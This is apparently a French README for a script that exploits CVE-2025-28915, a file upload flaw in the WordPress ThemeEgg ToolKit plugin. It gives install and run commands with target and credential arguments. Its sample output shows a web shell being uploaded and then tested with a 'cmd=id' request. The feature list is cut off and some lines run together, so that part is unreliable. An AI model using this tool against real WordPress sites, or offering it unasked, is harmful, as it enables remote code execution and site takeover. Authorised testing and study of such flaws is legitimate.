
Plugin WordPress ThemeEgg ToolKit <= 1.2.9 - Vulnérabilité de téléchargement de fichier arbitraire
Une vulnérabilité de téléchargement de fichier sans restriction dans le plugin ThemeEgg ToolKit pour WordPress (versions ≤ 1.2.9) permet à des attaquants authentifiés de télécharger des web shells sur le serveur. Cela peut entraîner une exécution de code à distance (RCE), une prise de contrôle complète du site et une compromission de données sensibles.
Ce script automatise l'exploitation de CVE-2025-28915 en :
requests, beautifulsoup4pip install requests beautifulsoup4
python CVE-2025-28915.py -u http://192.168.100.74:888/wordpress -un admin -p password123
| Argument | Description |
|---|---|
-u | URL WordPress cible (ex. : http://target.com/wordpress) |
-un | Nom d'utilisateur WordPress |
-p | Mot de passe WordPress |
[+] Vulnerable version detected: 1.2.9
[+] Logged in successfully.
[+] Found security nonce: f82467a997
[*] Uploading Web Shell...
[+] Web Shell uploaded successfully!
[+] Potential Web Shell location: http://target.com/wp-content/uploads/2025/03/shell.php
[*] Test command: http://target.com/wp-content/uploads/2025/03/shell.php?cmd=id
Ce script est uniquement destiné à des fins éducatives et de tests de sécurité autorisés. Toute utilisation non autorisée est illégale et contraire à l'éthique. L'auteur décline toute responsabilité en cas d'utilisation abusive.
Par : Khaled Alenazi (Nxploit)